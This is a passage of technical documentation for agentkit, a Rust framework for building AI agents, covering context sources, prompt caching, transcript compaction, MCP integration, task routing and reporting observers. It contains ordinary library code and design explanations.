pub trait ContextSource: Send + Sync {
    async fn load(&self) -> Result<Vec<Item>, ContextError>;
}
}

AgentsMd implements this trait. Custom sources implement it to load context from any source.

Context vs System items

ItemKind::Context is distinct from ItemKind::System because they serve different purposes:

ItemKind::SystemItemKind::Context
Example“You are a coding assistant”“This project uses Rust 2024 edition”
OriginHardcoded by the applicationLoaded from project files
ScopeSame across all projectsDifferent per project
MutabilityNever changes during a sessionMay be refreshed on context reload
CompactionPreserved during compactionMay be summarized or refreshed

This distinction matters for compaction:

  • System items are always preserved — they define the agent’s identity
  • Context items might be refreshed (reload from disk) or summarized during compaction

Writing custom context sources

The ContextSource trait is simple enough that custom sources are straightforward:

#![allow(unused)]
fn main() {
struct GitBranchContext;

#[async_trait]
impl ContextSource for GitBranchContext {
    async fn load(&self) -> Result<Vec<Item>, ContextError> {
        let output = tokio::process::Command::new("git")
            .args(["branch", "--show-current"])
            .output()
            .await
            .map_err(|e| ContextError::ReadFailed {
                path: PathBuf::from(".git"),
                error: e,
            })?;

        let branch = String::from_utf8_lossy(&output.stdout).trim().to_string();
        Ok(vec![Item {
            id: None,
            kind: ItemKind::Context,
            parts: vec![Part::Text(TextPart {
                text: format!("Current git branch: {branch}"),
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        }])
    }
}
}

Register it alongside other sources:

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(GitBranchContext)
    .load()
    .await?;
}

Other useful custom sources:

  • Load dependency versions from Cargo.toml or package.json
  • Load CI configuration summaries
  • Load recent git log entries
  • Load MCP resources (via ResourceProvider)
  • Load team-specific conventions from a shared server

Example: openrouter-context-agent demonstrates context loading from AGENTS.md and skills directories.

Crate: agentkit-context — depends on agentkit-core and async-fs for filesystem operations.

Prompt caching

Prompt caching reduces cost and latency by reusing stable prefixes of a turn request. This chapter covers the cache model in agentkit-loop: what the host configures, what the loop passes to providers, and how adapters translate that into provider-specific behavior.

Why caching lives at the request level

Caching is a transport optimization, not transcript semantics. The transcript is the conversation itself: system prompts, user messages, tool calls, tool results, and context items. Caching is applied when a turn is sent to a provider.

That distinction is why agentkit models caching on SessionConfig and TurnRequest, not on Item or Part.

#![allow(unused)]
fn main() {
pub struct SessionConfig {
    pub session_id: SessionId,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}

pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The host sets a session-level default. The loop copies that into each TurnRequest unless the host overrides the next turn explicitly.

The cache request shape

The request is provider-neutral:

#![allow(unused)]
fn main() {
pub enum PromptCacheMode {
    Disabled,
    BestEffort,
    Required,
}

pub enum PromptCacheRetention {
    Default,
    Short,
    Extended,
}

pub enum PromptCacheStrategy {
    Automatic,
    Explicit {
        breakpoints: Vec<PromptCacheBreakpoint>,
    },
}

pub enum PromptCacheBreakpoint {
    ToolsEnd,
    TranscriptItemEnd { index: usize },
    TranscriptPartEnd { item_index: usize, part_index: usize },
}

pub struct PromptCacheRequest {
    pub mode: PromptCacheMode,
    pub strategy: PromptCacheStrategy,
    pub retention: Option<PromptCacheRetention>,
    pub key: Option<String>,
}
}

Field semantics

FieldVariantMeaning
modeDisabledDo not send cache hints for this turn
BestEffortUse caching if the provider supports it; degrade silently otherwise
RequiredFail the turn if the cache request cannot be honored
strategyAutomaticLet the adapter use native provider behavior, or emulate it internally
ExplicitThe host specifies concrete cache boundaries
retentionProvider-neutral hint for short-lived vs extended retention
keyOptional stable cache key for providers that support one

Session defaults

The simplest place to configure caching is the session:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("coding-agent"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;
}

This says:

  • try to use prompt caching
  • let the provider or adapter choose the prefix automatically
  • prefer short-lived retention
  • do not require a user-supplied cache key

None vs Disabled

These have different semantics:

ValueMeaning
cache: NoneNo cache preference — adapters don’t add cache fields; provider-native automatic caching may still happen
cache: Some(... { mode: Disabled, .. })Explicitly disable cache controls from agentkit for this session or turn

Automatic strategy

PromptCacheStrategy::Automatic is the recommended default for most applications:

#![allow(unused)]
fn main() {
PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Automatic,
    retention: Some(PromptCacheRetention::Short),
    key: None,
}
}

Why this is the default shape:

  • it keeps the host provider-agnostic
  • OpenAI-style providers can use native automatic caching
  • Anthropic-style providers can be supported by adapters that synthesize explicit cache headers internally
  • unsupported providers degrade cleanly in BestEffort mode

In other words: the host chooses the policy, not the provider-specific mechanism.

Explicit strategy

When the host knows the desired boundaries, it can specify them directly:

#![allow(unused)]
fn main() {
let cache = PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Explicit {
        breakpoints: vec![
            PromptCacheBreakpoint::ToolsEnd,
            PromptCacheBreakpoint::TranscriptItemEnd { index: 3 },
        ],
    },
    retention: Some(PromptCacheRetention::Short),
    key: Some("workspace:agentkit".into()),
};
}

Breakpoints are expressed in request order:

  1. tools
  2. transcript items
  3. transcript parts within an item

This matters for providers that expose explicit cache boundaries on tools or message blocks.

Per-turn overrides

Session defaults are often enough, but the loop also supports per-turn overrides:

#![allow(unused)]
fn main() {
driver.set_next_turn_cache(PromptCacheRequest {
    mode: PromptCacheMode::Required,
    strategy: PromptCacheStrategy::Explicit {
        breakpoints: vec![PromptCacheBreakpoint::ToolsEnd],
    },
    retention: Some(PromptCacheRetention::Extended),
    key: Some("release-planning".into()),
})?;

driver.submit_input(vec![user_item])?;
}

Or in one call:

#![allow(unused)]
fn main() {
driver.submit_input_with_cache(
    vec![user_item],
    PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        strategy: PromptCacheStrategy::Automatic,
        retention: Some(PromptCacheRetention::Short),
        key: None,
    },
)?;
}

The override applies to the next model turn only. Later turns fall back to the session default.

How adapters use it

The loop does not interpret cache semantics itself. It passes the normalized request through to the adapter.

For completions-style providers, the mapping hook is:

#![allow(unused)]
fn main() {
fn apply_prompt_cache(
    &self,
    body: &mut serde_json::Map<String, Value>,
    request: &TurnRequest,
) -> Result<(), LoopError>;
}

That gives adapters three implementation choices:

  1. use native automatic caching controls
  2. synthesize explicit cache headers or request fields from the normalized request
  3. ignore unsupported cache requests in BestEffort mode, or error in Required mode

This is the architectural boundary: agentkit keeps the host-facing API stable while each provider adapter chooses the correct wire format.

Reporting cache usage

Providers can report cache reads and writes through normalized usage fields:

#![allow(unused)]
fn main() {
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}
}
  • cached_input_tokens
    • input tokens served from cache
  • cache_write_input_tokens
    • input tokens written into cache on this request

This makes caching visible to reporters and host-side cost accounting without exposing provider-specific response formats.

Practical recommendation

For most hosts, start here:

#![allow(unused)]
fn main() {
SessionConfig {
    session_id: SessionId::new("demo"),
    metadata: MetadataMap::new(),
    cache: Some(PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        strategy: PromptCacheStrategy::Automatic,
        retention: Some(PromptCacheRetention::Short),
        key: None,
    }),
}
}

Then reach for explicit breakpoints only when you need to control exact cache boundaries.

Crate: Prompt caching types live in agentkit-core. Session and turn-level cache handling is in agentkit-loop. Provider-specific cache mapping is in each agentkit-provider-* crate.

Transcript compaction

Long conversations exceed context windows. Compaction is how you keep an agent session viable without losing important context. This chapter covers agentkit-compaction: the trigger, strategy, and pipeline system.

The design

Compaction is optional and host-configured. It has three concerns:

  1. When to compact — the trigger
  2. How to compact — the strategy (or pipeline of strategies)
  3. What to use for semantic summarization — the optional backend
#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .compaction(CompactionConfig::new(trigger, strategy))
    .build()?;
}

Triggers

A CompactionTrigger decides whether compaction should run before a turn:

#![allow(unused)]
fn main() {
pub trait CompactionTrigger {
    fn should_compact(&self, transcript: &[Item], reason: &CompactionReason) -> bool;
}
}

Built-in: ItemCountTrigger::new(12) fires when the transcript exceeds 12 items.

Strategies

A CompactionStrategy transforms the transcript:

#![allow(unused)]
fn main() {
pub trait CompactionStrategy {
    async fn compact(
        &self,
        request: CompactionRequest,
        ctx: &mut CompactionContext,
    ) -> Result<CompactionResult, CompactionError>;
}
}

Built-in strategies:

StrategyDescription
DropReasoningStrategyRemoves reasoning parts from assistant items
DropFailedToolResultsStrategyRemoves tool results where is_error: true
KeepRecentStrategyKeeps the last N non-preserved items
SummarizeOlderStrategySummarizes older items through the backend

Preservation

KeepRecentStrategy supports preservation rules:

#![allow(unused)]
fn main() {
KeepRecentStrategy::new(8)
    .preserve_kind(ItemKind::System)
    .preserve_kind(ItemKind::Context)
}

System and context items are kept regardless of age. Only user/assistant/tool items are subject to trimming.

Pipelines

Multiple strategies compose into a pipeline:

#![allow(unused)]
fn main() {
CompactionPipeline::new()
    .with_strategy(DropReasoningStrategy::new())
    .with_strategy(DropFailedToolResultsStrategy::new())
    .with_strategy(KeepRecentStrategy::new(8)
        .preserve_kind(ItemKind::System)
        .preserve_kind(ItemKind::Context))
}

Strategies execute in order. Each one receives the output of the previous.

Semantic compaction

For summarization, the host injects a CompactionBackend:

#![allow(unused)]
fn main() {
let config = CompactionConfig::new(trigger, strategy).with_backend(my_backend);
}

The backend receives a SummaryRequest and returns a SummaryResult. agentkit does not include a built-in LLM client — the backend is host-provided. The openrouter-compaction-agent example uses a nested agent loop as the summarization backend.

A compaction example

Before and after a compaction pipeline run:

Before (20 items, trigger threshold: 12):

  [0]  System: "You are a coding assistant"           ← preserved
  [1]  Context: "Project uses Rust 2024..."            ← preserved
  [2]  User: "What files are in src/?"
  [3]  Asst: (reasoning) "Let me list the directory"
             (text) "I'll check..."
             (tool_call) fs.list_directory
  [4]  Tool: ["main.rs", "lib.rs", "parser.rs"]
  [5]  Asst: "There are three files..."
  [6]  User: "Read parser.rs"
  [7]  Asst: (tool_call) fs.read_file
  [8]  Tool: "fn parse() { ... }"
  [9]  Asst: "The parser contains..."
  [10] User: "Add error handling"
  [11] Asst: (tool_call) fs.replace_in_file
  [12] Tool: { is_error: true, "search text not found" }  ← failed
  [13] Asst: "Let me try again..."
             (tool_call) fs.replace_in_file
  [14] Tool: "Replacement successful"
  [15] Asst: (tool_call) shell.exec("cargo check")
  [16] Tool: "Compiling... 0 errors"
  [17] Asst: "Done! I added error handling..."
  [18] User: "Now add tests"
  [19] Asst: (thinking about tests...)


Pipeline:
  1. DropReasoningStrategy     → removes reasoning parts from [3], [19]
  2. DropFailedToolResultsStrategy → removes failed result [12]
  3. KeepRecentStrategy(8, preserve System+Context)

After (10 items):

  [0]  System: "You are a coding assistant"            ← preserved
  [1]  Context: "Project uses Rust 2024..."             ← preserved
  [2]  Asst: "Let me try again..."                      ← recent 8 start here
             (tool_call) fs.replace_in_file
  [3]  Tool: "Replacement successful"
  [4]  Asst: (tool_call) shell.exec("cargo check")
  [5]  Tool: "Compiling... 0 errors"
  [6]  Asst: "Done! I added error handling..."
  [7]  User: "Now add tests"
  [8]  Asst: (now without reasoning part)

The model lost the early conversation but retains the system prompt, project context, and the most recent work. This is usually a good trade-off — the model’s attention is strongest on recent items anyway.

Compaction vs prompt caching

Compaction and prompt caching both operate on the turn request, but they optimize for different things:

  • Prompt caching tries to reuse an unchanged serialized prefix from earlier turns
  • Compaction deliberately changes the serialized transcript to make it shorter

That means compaction often invalidates the cache prefix even when the conversation is still logically continuous.

Consider the actual prompt prefix sent to the provider:

Before compaction:

  [system]
  [context]
  [user 1]
  [assistant 1]
  [tool result 1]
  [user 2]
  [assistant 2]
  [user 3]

  cacheable prefix for turn N:
  └───────────────────────────────────────────────┘


After compaction:

  [system]                       ← still present
  [context]                      ← still present
  [compaction summary]           ← new item, replaces older history
  [assistant 2]
  [user 3]

  new cacheable prefix for turn N+1:
  └─────────────────────────────┘

Provider-side caches are keyed on the exact prompt prefix, not the semantic meaning of the conversation. These changes all tend to invalidate an existing cache entry:

  • dropping reasoning parts
  • removing failed tool results
  • trimming old user/assistant/tool items
  • replacing many old items with a single summary item
  • reordering or refreshing context items

What survives compaction

After compaction, only the compacted transcript is part of future conversation history from the model’s perspective.

RetainedDropped
Preserved System itemsReasoning blocks
Preserved Context itemsFailed tool results
Recent user/assistant/tool items that survivedOlder conversation items past the keep window
Summary items from semantic compactionRaw items replaced by a summary

The provider-side cache itself is not conversation history — it is transport state owned by the provider. It can accelerate reuse of a prompt prefix, but it does not extend the model’s memory. If compaction removes or rewrites earlier items, those items are gone from the request even if an older provider cache entry still exists.

The trade-off

Compaction can reduce cache hit rates in exchange for keeping the session under the context window.

That trade-off is often still correct:

  • without compaction, the session may stop fitting at all
  • with compaction, the transcript becomes shorter and cheaper even if an old cache prefix is no longer reusable
  • preserved system/context prefixes still give the cache some stable surface area

In practice:

  • structural compaction usually causes smaller cache disruptions
  • semantic compaction causes larger cache disruptions because it replaces many items with a new summary
  • long-lived context items and stable tool schemas are still good cache anchors

This does not mean all caching efficiency is lost after compaction. The typical sequence:

  1. the old cacheable prefix becomes invalid because the transcript changed
  2. the compacted transcript is sent on the next turn
  3. that new, shorter transcript becomes the new cacheable prefix
  4. subsequent turns reuse the compacted prefix until the next compaction cycle

Compaction behaves like a cache reset followed by a new stable baseline.

turn N-1:
  long history prefix                          ← cached

turn N:
  compaction runs
  compacted transcript sent                    ← old cache no longer matches

turn N+1, N+2, N+3:
  same compacted transcript prefix reused      ← new cache hits accumulate

This is one reason semantic compaction can still be efficient overall. The summary item may replace a large unstable history with a much smaller durable prefix that is cheap to resend and easy to cache for the next several turns.

This is why caching is configured separately from compaction in agentkit. Compaction decides what the transcript should be. Caching then operates on whatever transcript remains. For the cache model itself, see Chapter 15.

Loop integration

When compaction fires:

  1. AgentEvent::CompactionStarted is emitted (with the trigger reason)
  2. The strategy pipeline transforms the transcript
  3. The loop replaces its working transcript with the compacted result
  4. AgentEvent::CompactionFinished is emitted (with before/after item counts)
Turn lifecycle with compaction:

  submit_input()
       │
       ▼
  ┌── compaction check ──┐
  │                      │
  │  trigger fires?      │
  │  yes → run pipeline  │
  │  no  → skip          │
  └──────────┬───────────┘
             │
             ▼
  begin model turn (with post-compaction transcript)

This happens before the model sees the transcript for the next turn. The model never observes raw compaction artifacts — it just sees a shorter transcript.

Compaction is not summarization

Most compaction strategies are structural — they drop parts or trim items without understanding semantics. DropReasoningStrategy removes reasoning blocks because they’re verbose and not needed for future turns. KeepRecentStrategy drops old items because the model’s attention is weakest on them.

Only SummarizeOlderStrategy (with a CompactionBackend) does semantic work — it summarizes old items into a shorter form. This requires an LLM call, which adds latency and cost. The openrouter-compaction-agent example uses a nested agent loop as the summarization backend.

Example: openrouter-compaction-agent demonstrates all three types: structural (drop reasoning), hybrid (keep recent + summarize older), and semantic (nested-agent summarization backend).

Crate: agentkit-compaction — depends on agentkit-core. The loop integration is in agentkit-loop.

MCP integration

The Model Context Protocol (MCP) lets agents discover and use tools, resources, and prompts from external servers. This chapter covers agentkit-mcp: how MCP fits into the capability and tool layers, and how auth and lifecycle are managed.

What MCP solves

Without MCP, every external integration is a custom tool. Connecting to GitHub means writing a GitHub tool. Connecting to a database means writing a database tool. Each one has bespoke connection logic, auth handling, and discovery.

MCP standardizes this: external servers expose capabilities through a uniform protocol, and the agent discovers them at runtime instead of compile time.

Without MCP:                          With MCP:

  Agent                                Agent
  ├── GitHubTool (custom)              ├── MCP client
  ├── DatabaseTool (custom)            │   ├── github-server (discovered)
  ├── SlackTool (custom)               │   ├── database-server (discovered)
  └── JiraTool (custom)                │   └── slack-server (discovered)
                                       │
  Each tool: custom code,              Each server: standard protocol,
  custom auth, custom schema           standard auth, standard schema

MCP in the capability model

MCP servers expose three capability types, which map directly to agentkit’s capability layer:

MCP conceptagentkit abstractionHow it’s used
MCP toolsInvocable → adapted to ToolModel calls them during turns
MCP resourcesResourceProviderHost reads them for context loading
MCP promptsPromptProviderHost renders them for transcript injection

An MCP server implements CapabilityProvider, exposing all three through one registration point.

Server configuration

#![allow(unused)]
fn main() {
pub struct McpServerConfig {
    pub id: McpServerId,
    pub transport: McpTransportBinding,
    pub auth: McpAuthConfig,
    pub metadata: MetadataMap,
}
}

Built-in transports: stdio (local child process), Streamable HTTP (modern remote MCP), and legacy SSE (deprecated HTTP+SSE compatibility). Custom transports implement the McpTransportFactory trait.

Discovery

After connecting, the server’s capabilities are captured in a snapshot:

#![allow(unused)]
fn main() {
pub struct McpDiscoverySnapshot {
    pub server_id: McpServerId,
    pub tools: Vec<McpToolDescriptor>,
    pub resources: Vec<McpResourceDescriptor>,
    pub prompts: Vec<McpPromptDescriptor>,
    pub metadata: MetadataMap,
}
}

Snapshots are cacheable and refreshable. Hosts choose which capabilities to expose — discovery doesn’t automatically register everything.

Tool adaptation

McpToolAdapter wraps an MCP tool as a Tool implementation:

  • Exposes a ToolSpec derived from the MCP tool descriptor
  • Translates ToolRequest into MCP invocation
  • Translates MCP responses into normalized ToolResult
  • Surfaces auth interruptions as ToolInterruption::AuthRequired

Namespacing

MCP tools are namespaced by default: mcp.<server_id>.<tool_name>. This prevents collisions with native tools. Hosts can override names if they want a cleaner surface.

Auth as interruption

MCP auth follows the same interrupt pattern as tool approvals:

  1. Tool invocation triggers an auth requirement
  2. The tool adapter returns ToolInterruption::AuthRequired
  3. The loop surfaces it as LoopStep::Interrupt(AuthRequest)
  4. The host performs the auth flow (OAuth, API key entry, etc.)
  5. The host resolves the interrupt and the operation resumes

Auth is never hidden retry logic. The host always knows when auth is happening and controls the flow.

For non-tool MCP operations (connecting, reading resources), auth follows the same pattern but through the MCP manager API rather than the loop interrupt system.

Resources and prompts

Resources and prompts have dedicated APIs, separate from the tool path:

#![allow(unused)]
fn main() {
pub trait McpResourceStore {
    async fn list_resources(&self, server: &McpServerId) -> ...;
    async fn read_resource(&self, server: &McpServerId, resource: &McpResourceId) -> ...;
}

pub trait McpPromptStore {
    async fn list_prompts(&self, server: &McpServerId) -> ...;
    async fn get_prompt(&self, server: &McpServerId, prompt: &McpPromptId, args: Value) -> ...;
}
}

MCP resources integrate with agentkit-context for injecting project-specific data into the transcript. MCP prompts integrate with context loading for template-based prompt assembly.

Transports

Transport details stay inside agentkit-mcp:

#![allow(unused)]
fn main() {
pub trait McpTransport: Send {
    async fn send(&mut self, message: McpFrame) -> Result<(), McpError>;
    async fn recv(&mut self) -> Result<Option<McpFrame>, McpError>;
    async fn close(&mut self) -> Result<(), McpError>;
}
}

Built-in transports:

TransportConnectionUse case
stdioSpawn child process, pipe stdin/stdoutLocal tool servers
Streamable HTTPHTTP POST with JSON or SSE responsesModern remote tool servers
SSEHTTP connection with server-sent eventsLegacy remote tool servers

The rest of agentkit doesn’t know whether a server is reached via stdio, TCP, or WebSocket. The transport is configured in McpServerConfig and the MCP manager handles the connection lifecycle.

stdio transport

The most common pattern for local MCP servers. The agent spawns the server as a child process and communicates over stdin/stdout:

Agent process ──── stdin ────▶ MCP server process
              ◀── stdout ────

This is how tools like GitHub’s MCP server, filesystem tools, and database connectors typically run. The server starts on demand and exits when the agent disconnects.

Streamable HTTP transport

For modern remote MCP servers that run as HTTP services. The agent sends JSON-RPC over HTTP POST, receives either JSON or SSE responses, and tracks negotiated session/protocol headers:

Agent ──── HTTP POST ────▶ Remote MCP server
      ◀── JSON or SSE ───

If an SSE response stream is interrupted before the matching response arrives, the client can resume with Last-Event-ID.

Legacy SSE transport

For older MCP servers that still use the deprecated HTTP+SSE transport, agentkit-mcp also keeps the original SSE endpoint flow.

The full picture

┌──────────────────────────────────────────────────────────┐
│  Agent loop                                              │
│                                                          │
│  ┌──────────────────────┐   ┌──────────────────────┐     │
│  │  Native tools        │   │  MCP tools           │     │
│  │  (ToolRegistry)      │   │  (McpToolAdapter)    │     │
│  │  fs.read_file        │   │  mcp.github.search   │     │
│  │  shell.exec          │   │  mcp.db.query        │     │
│  └──────────┬───────────┘   └──────────┬───────────┘     │
│             │                          │                 │
│             └──── unified tool list ───┘                 │
│                        │                                 │
│               presented to model                         │
│                                                          │
│  MCP resources ──▶ ContextLoader ──▶ transcript          │
│  MCP prompts   ──▶ ContextLoader ──▶ transcript          │
└──────────────────────────────────────────────────────────┘

Native tools and MCP tools appear as a single list to the model. The model doesn’t know (or need to know) which tools come from MCP and which are native. The mcp.<server_id>. prefix distinguishes them in the tool name for human readers and policy evaluation, but the model just sees a tool spec with a name and schema.

Example: openrouter-mcp-tool demonstrates MCP tool discovery and invocation. openrouter-agent-cli shows MCP integrated into a full agent with context, tools, and compaction.

Crate: agentkit-mcp — depends on agentkit-capabilities, agentkit-tools-core, and agentkit-core.

Task management and parallelism

When an agent calls multiple tools in a single turn, running them sequentially wastes time. When a shell command takes 30 seconds, the agent shouldn’t be blocked waiting. This chapter covers agentkit-task-manager: how tool calls are scheduled, routed, and delivered.

The problem

The default behavior is sequential: tool calls execute one at a time on the current task. This is correct and simple, but it becomes a bottleneck when:

  • The model requests multiple independent tool calls
  • A shell command runs for a long time
  • You want to start background work while the model continues

TaskManager trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait TaskManager {
    async fn start_task(&self, request: TaskLaunchRequest, ctx: TaskStartContext)
        -> Result<TaskStartOutcome, TaskManagerError>;

    async fn wait_for_turn(&self, turn_id: &TurnId, cancellation: Option<TurnCancellation>)
        -> Result<Option<TurnTaskUpdate>, TaskManagerError>;

    async fn take_pending_loop_updates(&self)
        -> Result<PendingLoopUpdates, TaskManagerError>;

    async fn on_turn_interrupted(&self, turn_id: &TurnId)
        -> Result<(), TaskManagerError>;

    fn handle(&self) -> TaskManagerHandle;
}
}

SimpleTaskManager (default)

Runs every tool call inline. No Tokio dependency. No concurrency. Returns the result before the driver continues. This is the default when no task manager is configured.

AsyncTaskManager

Spawns each tool call as a Tokio task. Tasks are classified through a TaskRoutingPolicy:

#![allow(unused)]
fn main() {
pub enum RoutingDecision {
    Foreground,
    Background,
    ForegroundThenDetachAfter(Duration),
}
}
  • Foreground — blocks the current turn until resolved
  • Background — runs independently, results delivered later
  • ForegroundThenDetachAfter(Duration) — starts foreground, automatically promotes to background if it hasn’t finished within the timeout

Routing policies

Implement TaskRoutingPolicy or use a closure:

#![allow(unused)]
fn main() {
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell.exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(5))
    } else {
        RoutingDecision::Foreground
    }
});
}

This lets you make filesystem tools synchronous (fast, no overhead) while giving shell commands a timeout before they detach.

Task lifecycle events

The TaskManagerHandle provides an event stream:

#![allow(unused)]
fn main() {
pub enum TaskEvent {
    Started(TaskSnapshot),
    Detached(TaskSnapshot),
    Completed(TaskSnapshot, ToolResultPart),
    Cancelled(TaskSnapshot),
    Failed(TaskSnapshot, ToolError),
    ContinueRequested,
}
}

Host code can subscribe to these events for progress reporting, UI updates, or manual task management:

#![allow(unused)]
fn main() {
let handle = task_manager.handle();
// List running tasks, cancel tasks, drain results, subscribe to events
}

Integration with the loop

The loop driver integrates with the task manager transparently:

  1. Tool call arrives from the model
  2. Driver asks the task manager to start a task
  3. If TaskStartOutcome::Ready — result is immediately available
  4. If TaskStartOutcome::Pending — driver waits for foreground tasks via wait_for_turn()
  5. Background task results are picked up via take_pending_loop_updates() on the next iteration
  6. Background results are injected into the transcript as tool results

The detach-after-timeout pattern

ForegroundThenDetachAfter deserves special attention. It solves a common problem: you want the model to wait for a command’s output, but you don’t want a slow command to block the entire turn.

ForegroundThenDetachAfter(5s) — two possible outcomes:

Fast command (< 5s):

  t=0s  Task starts (foreground)
  t=3s  Command finishes → result returned immediately
        └── Model sees output, continues normally
        └── Identical to pure Foreground routing


Slow command (> 5s):

  t=0s  Task starts (foreground)
  t=5s  Timeout expires → task promoted to background
        └── Model receives: "Task detached (still running)"
        └── Model continues its turn (reads files, etc.)
  t=30s Command finishes → result stored
        └── On next turn, driver picks up the result
        └── Result injected into transcript as a tool result

This is the right default for shell commands in a coding agent:

  • cargo check (2 seconds) → foreground, model sees the output immediately
  • cargo test (30 seconds) → detaches after 5s, model continues working
  • ls (instant) → foreground, practically no delay

How background results re-enter the loop

When the driver starts a new turn, it calls task_manager.take_pending_loop_updates(). Any completed background tasks have their results injected into the transcript before the model sees it:

Turn N:
  Model: ToolCall(shell.exec, "cargo test")
  Task manager: starts foreground, detaches after 5s
  Model receives: "task detached"
  Model: ToolCall(fs.read_file, "src/test_results.rs")  ← continues working
  Turn ends

Turn N+1:
  take_pending_loop_updates() → cargo test finished: "3 tests passed"
  Result injected into transcript
  Model sees: tool result from cargo test + new user message
  Model: "All 3 tests pass. Here's what I changed..."

Task lifecycle

              ┌─────────────────┐
              │     Started     │
              └────────┬────────┘
                       │
        ┌──────────────┼─────────────┐
        │              │             │
  Foreground    FG then detach   Background
        │              │             │
        │         ┌────▼─────┐       │
        │         │ timeout? │       │
        │         └──┬───┬───┘       │
        │         no │   │ yes       │
        │            │   │           │
  ┌─────▼────────────▼┐  │  ┌────────▼──────┐
  │    Foreground     │  │  │  Background   │
  │    (blocks turn)  │  │  │  (async)      │
  └─────────┬─────────┘  │  └──────┬────────┘
            │            │         │
            │     ┌──────▼─────┐   │
            │     │  Detached  │   │
            │     │  (async)   │   │
            │     └──────┬─────┘   │
            │            │         │
       ┌────▼────────────▼─────────▼────┐
       │       Completed / Failed       │
       └────────────────────────────────┘

Choosing a routing strategy

ScenarioRecommended routingWhy
File read/writeForegroundFast, order matters, model needs result immediately
Short shell commands (ls, git status)ForegroundFast enough that detach overhead isn’t worth it
Build commands (cargo build, npm build)ForegroundThenDetachAfter(5-10s)May be fast, may be slow — let the timeout decide
Test suitesForegroundThenDetachAfter(5s)Often slow, model can do other work while waiting
Long-running serversBackgroundModel shouldn’t wait at all
Independent parallel tool callsForeground (with AsyncTaskManager)AsyncTaskManager runs foreground tasks concurrently

Example: openrouter-parallel-agent uses AsyncTaskManager with ForegroundThenDetachAfter routing for shell tools and foreground routing for filesystem tools. The TaskManagerHandle event stream is printed to stderr.

Crate: agentkit-task-manager — depends on agentkit-tools-core, agentkit-core, and tokio.

Reporting and observability

An agent that you can’t observe is an agent you can’t debug. This chapter covers agentkit-reporting: how events flow from the loop to observers, and the built-in reporter implementations.

The observer contract

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

Observers are synchronous and called in deterministic order. This is a deliberate choice:

  • Deterministic ordering — if event B depends on event A, observers always see A first
  • No async leakage — the loop stays runtime-agnostic
  • Simple reasoning — observer behavior is fully predictable

The cost is that observers must be fast. Heavy processing should happen behind a channel adapter.

Event flow:

  LoopDriver
       │
       ├── emit(AgentEvent)
       │        │
       │        ├──▶ Observer 1 (StdoutReporter)    → print to terminal
       │        ├──▶ Observer 2 (JsonlReporter)      → write to log file
       │        └──▶ Observer 3 (UsageReporter)      → accumulate counters
       │
       │   Observers are called in registration order.
       │   Each observer blocks until it returns.
       │   Total time = sum of all observer handle_event() calls.
       │
       └── continue loop execution

Built-in reporters

StdoutReporter

Human-readable terminal output. Handles streaming text deltas, tool lifecycle notices, approval prompts, and turn summaries. Intentionally conservative — line-oriented output, no cursor management or advanced TUI tricks.

JsonlReporter

One structured JSON object per event, newline-delimited. Useful for audit logs, debugging, and external system ingestion. Uses a stable envelope format with event type, timestamp, session ID, turn ID, and payload.

UsageReporter

Aggregates token usage across a session: input tokens, output tokens, reasoning tokens, cached input tokens, cache write tokens, estimated cost. Exposes query methods for per-turn and cumulative totals.

TranscriptReporter

Reconstructs an inspectable transcript from events. Useful for debugging, persistence, and testing. Important constraint: the reporter reconstructs a derived view — the loop owns the authoritative working transcript.

CompositeReporter

Fans out events to multiple child reporters:

#![allow(unused)]
fn main() {
let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(JsonlReporter::new(file))
    .with_observer(UsageReporter::new());
}

Adapter reporters

For expensive or async reporting:

  • BufferedReporter — enqueues events for batch flushing
  • ChannelReporter — forwards events to another thread or task via a sender
  • TracingReporter — converts events into tracing spans and events

These adapters wrap the synchronous observer contract without changing it.

Failure policy

Reporter failures are non-fatal by default. A broken log writer shouldn’t crash the agent. Hosts can configure stricter behavior:

  • Ignore — swallow errors
  • Log — log errors to stderr
  • Accumulate — collect errors for later inspection
  • FailFast — abort on first error

Writing a custom observer

The trait is simple enough that custom observers are straightforward:

#![allow(unused)]
fn main() {
struct ToolCallCounter {
    count: usize,
}

impl LoopObserver for ToolCallCounter {
    fn handle_event(&mut self, event: AgentEvent) {
        if matches!(event, AgentEvent::ToolCallRequested(_)) {
            self.count += 1;
        }
    }
}
}

A more practical example — a reporter that writes tool calls to a structured log:

#![allow(unused)]
fn main() {
struct AuditLogger {
    writer: BufWriter<File>,
}

impl LoopObserver for AuditLogger {
    fn handle_event(&mut self, event: AgentEvent) {
        match &event {
            AgentEvent::ToolCallRequested(call) => {
                writeln!(self.writer, "TOOL_CALL: {} input={}", call.name,
                    serde_json::to_string(&call.input).unwrap_or_default()
                ).ok();
            }
            AgentEvent::ApprovalRequired(req) => {
                writeln!(self.writer, "APPROVAL_REQUIRED: {} reason={:?}",
                    req.summary, req.reason
                ).ok();
            }
            _ => {}
        }
    }
}
}

